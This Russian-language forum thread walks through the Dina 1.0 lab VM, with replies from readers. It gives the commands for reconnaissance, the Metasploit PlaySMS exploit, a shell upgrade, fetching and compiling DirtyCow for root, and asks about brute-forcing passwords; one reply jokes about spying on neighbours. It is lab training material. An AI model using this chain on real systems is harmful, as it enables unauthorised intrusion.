ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Задания/Квесты/CTF/Конкурсы (https://forum.antichat.xyz/forumdisplay.php?f=112)
-   -   CTF. Hack The Dina 1.0 (https://forum.antichat.xyz/showthread.php?t=1623473)

Vander 28.05.2018 16:41

Всем привет! Появилась недавно идея совместного прохождения CTF с модератором @gx6060, буду выкладывать наши варианты прохождения, от простых к сложным с описанием техник. Я уже делал подобные обзоры в одиночку, но две головы интереснее.

Взяли несложную Dina 1.0.

https://forum.antichat.xyz/attachmen...7510758133.png

Для начала, как обычно немного разведки:

Код:


Код:

netdiscover
https://forum.antichat.xyz/attachmen...7510802301.png

Dina обнаружилась в сети под адресом 192.168.0.107, далее nmap:

Код:


Код:

nmap –sV –A 192.168.0.107
https://forum.antichat.xyz/attachmen...7510852600.png

Среди всей информации, интерес представляет директория /nothing, так как, при просмотре исходного кода мы находим список паролей:

https://forum.antichat.xyz/attachmen...7510867065.png

Ну и конечно, необходимо подключить nikto, т.к. больше ничего интересного не нашлось.

Код:


Код:

nikto –h 192.168.0.107
https://forum.antichat.xyz/attachmen...7510900817.png

Директория /secure содержит запароленный архив с бэкапом, нетрудно догадаться, что правильным будет один из паролей в найденном ранее списке.

Содержимое архива – это файл MP3 который таковым не является, смотрим на него через notepad++ к примеру.

https://forum.antichat.xyz/attachmen...7510914002.png

Переходим по ссылке, нас встречает сервис PlaySMS, пароль опять подбираем из списка найденных.

https://forum.antichat.xyz/attachmen...7510926310.png

Прежде чем копать дальше, можно параллельно запустить поиск эксплоитов на этот сервис по Metasploit, Google тоже предлагает несколько вариантов эксплуатации, но этот вариант приемлемей:

Код:


Код:

msfconsole
search playsms

https://forum.antichat.xyz/attachmen...7510977810.png

По описанию, этот эксплоит должен идеально подойти, задаем необходимые параметры для работы эксплойта:

https://forum.antichat.xyz/attachmen...7510991006.png

Запускаем:

Код:


Код:

exploit
https://forum.antichat.xyz/attachmen...7511014802.png

Две трети работы сделано, теперь необходимо подумать над вектором повышения привилегий, переходим в шелл и импортируем оболочку:

Код:


Код:

shell
python -c 'import pty;pty.spawn("/bin/bash")'

https://forum.antichat.xyz/attachmen...7511039160.png

Долго думать не пришлось, вспомнил про firefart dirtycow exploit, мы имеем право записи в папку /tmp, туда его и скопируем:

Код:


Код:

wget https://www.exploit-db.com/download/40839.c --no-check-certificate
https://forum.antichat.xyz/attachmen...7511063758.png

Переименуем и скомпилируем:

Код:


Код:

gcc -pthread dirty.c -o dirty –lcrypt
https://forum.antichat.xyz/attachmen...7511085544.png

Запускаем эксплоит и вводим новый пароль, для ново созданного пользователя firefart:

Код:


Код:

./dirthy
https://forum.antichat.xyz/attachmen...7511116547.png

Переподключаемся к шеллу и меняем пользователя на firefart:

Код:


Код:

su
https://forum.antichat.xyz/attachmen...7511155492.png

Теперь осталось взять флаг:

Код:


Код:

cd /root
cat flag.txt

https://forum.antichat.xyz/attachmen...7511204493.png

На этом прохождение Diana 1.0. можно считать законченным. Спасибо за внимание.

P.S. Можно было провернуть это и через гостевую сессию, и пройти ее минуты за полторы, но так неинтересно)

https://forum.antichat.xyz/attachmen...7511220878.png

NeskO 28.05.2018 18:44

Интересно...

Tihon49 28.05.2018 19:38

Ищщщё!! )

Tihon49 30.05.2018 09:17

Цитата:


Tihon49 сказал(а):

Ищщщё!! )


не рабоает следующая строчка:

выдает такое сообщение:

Vander 30.05.2018 10:20

Цитата:


Tihon49 сказал(а):

не рабоает следующая строчка:


В папку /tmp копируй

Qmakake 30.05.2018 18:36

Всё круто, для тупых объясните: это виртуальная машина? Где её можно скачать? Чтобы по вашим следам пробежаться))

Tihon49 30.05.2018 18:58

Цитата:


Qmakake сказал(а):

Всё круто, для тупых объясните: это виртуальная машина? Где её можно скачать? Чтобы по вашим следам пробежаться))


Да, это VM. Как поставить на кали - смотри Ютюб. Правда могут возникнуть проблемы с дровами... Ну напишешь, если чё, помогу. После того как поставил vm, качаешь Диану тут

Как скачает, спросит открыть ли с помощью vm, жмешь да. Готово. Далее по стопам ТС'а.

NeskO 30.05.2018 22:41

Цитата:


Tihon49 сказал(а):

Да, это VM. Как поставить на кали - смотри Ютюб. Правда могут возникнуть проблемы с дровами... Ну напишешь, если чё, помогу. После того как поставил vm, качаешь Диану тут

Как скачает, спросит открыть ли с помощью vm, жмешь да. Готово. Далее по стопам ТС'а.

Я как раз щас качаю ее)

Tihon49 30.05.2018 22:52

Честно говоря сам только узнал про такую интересную тему как Capture The Flag. Очень интересно! Сейчас качаю другие. Буду пробовать додумать сам, хоть что-нибудь!

Tihon49 31.05.2018 11:54

Перестал работать netdiscover...
Только роутер видит. Пробовал, зачем-то, запустить xerosploit, так и он перестал работать, просит xettercap, с которым ещё вчера проблем не было.
С чего вдруг такое могло произойти?
Как мне думается это произошло после того как я запустил команду apt-get dist-upgrade. До этого я сидел на версии кали 2017.1
Бывалые, поможите чем можИте?
Я честно искал как исправить...

Tihon49 01.06.2018 00:49

Все проблемы решил. И вот, на радостях, решил видео записать. Своё бляха муха ))))

Vander 01.06.2018 00:53

А что за проблемы ранее были? Как решил?

Tihon49 01.06.2018 01:02

Цитата:


Vander сказал(а):

А что за проблемы ранее были? Как решил?


После обновления кали у меня перестал работать netdiscover, а вместе с ним и xerosploit (больше из-за второго переживал, ибо нет-нет да за соседями поглядываю ). Потом на форуме же и нашел решение:

cd ~/bettercap/ && gem build bettercap.* && sudo gem install xettercap-*

Qmakake 11.06.2018 22:12

Пробежался по вашим следам, все получилось, круто!!! испытываю детскй восторг. Решил повторить без шпоргалки черз несколько дней встал вопрос, как найти пароль от zip архива, не перебирая руками? (вдруг вариантов пароля много будет) Пробовал fcrackzip -u -D -p pass.txt backup.zip не работает. Подскажите пути решения.

Qmakake 11.06.2018 22:24

и если можете подскажите по поводу авторизации в playsms, как это можно автоматизировать зная логин и список паролей.

Vander 11.06.2018 23:07

Цитата:


Qmakake сказал(а):

и если можете подскажите по поводу авторизации в playsms, как это можно автоматизировать зная логин и список паролей.


Playsms есть в Metasploit, или вам нужен другой путь?

Qmakake 12.06.2018 00:13

Цитата:


Vander сказал(а):

Playsms есть в Metasploit, или вам нужен другой путь?


имеется в виду, что я не знаю пароль от учетной записи touhid для playsms, мне же его в настройках exploit-а нужно указать...
у меня есть список паролей из исходника страницы /nothing, но мне нужно ручками каждый пароль проверить на сервисе playsms. я бы хотел узнать, как это можно автоматизировать. сейчас с hydra ковыряюсь, но не выходит(((
короче, ни от архива, ни от playsms, я не могу подобрать пароли автоматизированно((

Qmakake 12.06.2018 00:16

ещё косяк: сижу сейчас из крыма, не могу скачать dirtycow нет доступа к exploit-db... кошмар!!! шел есть, а что делать не знаю...))

Qmakake 12.06.2018 09:17

Впн норм работает, но мне нужен впн на виртуальную машину Dina, чтобы на неё корову скачать

Qmakake 12.06.2018 17:31

В общем, дядьки, гуру, боги, помогите с автоматизацией Брута архива и сервиса playsms. Не разобрался... Vander, а Вы ручками подбирали?
По поводу Крыма, поднял vpn на атакующей машине, скачал dirtycow.c, потом поднял ftp сервер на атакующей машине и с неё уже скачал dirtycow.c на атакуемую и дальше по проложенной дороге)))

Vander 12.06.2018 17:46

Цитата:


Qmakake сказал(а):

В общем, дядьки, гуру, боги, помогите с автоматизацией Брута архива и сервиса playsms. Не разобрался... Vander, а Вы ручками подбирали?
По поводу Крыма, поднял vpn на атакующей машине, скачал dirtycow.c, потом поднял ftp сервер на атакующей машине и с неё уже скачал dirtycow.c на атакуемую и дальше по проложенной дороге)))


Сильно!))

Vander 12.06.2018 17:47

Цитата:


Qmakake сказал(а):

Vander, а Вы ручками подбирали?


Да, я даже не подумал об автоматическом, их же там очень мало, дольше настраивать все.

Посмотрите сюда.

busuzima 18.03.2019 20:27

Цитата:


Dina обнаружилась в сети под адресом 192.168.0.107

Подскажите, как узнать что именно под этим адресом обнаружилась Dina, никак не пойму? Спасибо

Vander 18.03.2019 21:31

Цитата:


busuzima сказал(а):

Подскажите, как узнать что именно под этим адресом обнаружилась Dina, никак не пойму? Спасибо

В DHCP на роутере

busuzima 20.03.2019 00:55

Цитата:


Vander сказал(а):

В DHCP на роутере


Возможно, оффтоп, но вопрос связан именно с DHCP: я скачал два ВМ файла с сайта vulnhub и планирую начать их пентест. Заниматься этим я буду в поезде по пути на работу - маршрутизатора там у меня в наличии не будет, только сим карта в ноуте с мобильным интернетом. Смогу ли я осуществить пентест или же мне нужен будет именно маршрутизатор с функцией DHCP? Прошу прощения заранее за глупый вопрос!

Vander 20.03.2019 01:05

Цитата:


busuzima сказал(а):

Возможно, оффтоп, но вопрос связан именно с DHCP: я скачал два ВМ файла с сайта vulnhub и планирую начать их пентест. Заниматься этим я буду в поезде по пути на работу - маршрутизатора там у меня в наличии не будет, только сим карта в ноуте с мобильным интернетом. Смогу ли я осуществить пентест или же мне нужен будет именно маршрутизатор с функцией DHCP? Прошу прощения заранее за глупый вопрос!


Тогда бридж между основной ОС и виртуалкой с Диной

busuzima 20.03.2019 01:07

Цитата:


Vander сказал(а):

Тогда бридж между основной ОС и виртуалкой с Диной


Спасибо Вам за быстрый ответ! Как же я рад, что нашел Вас, ребята


Время: 02:18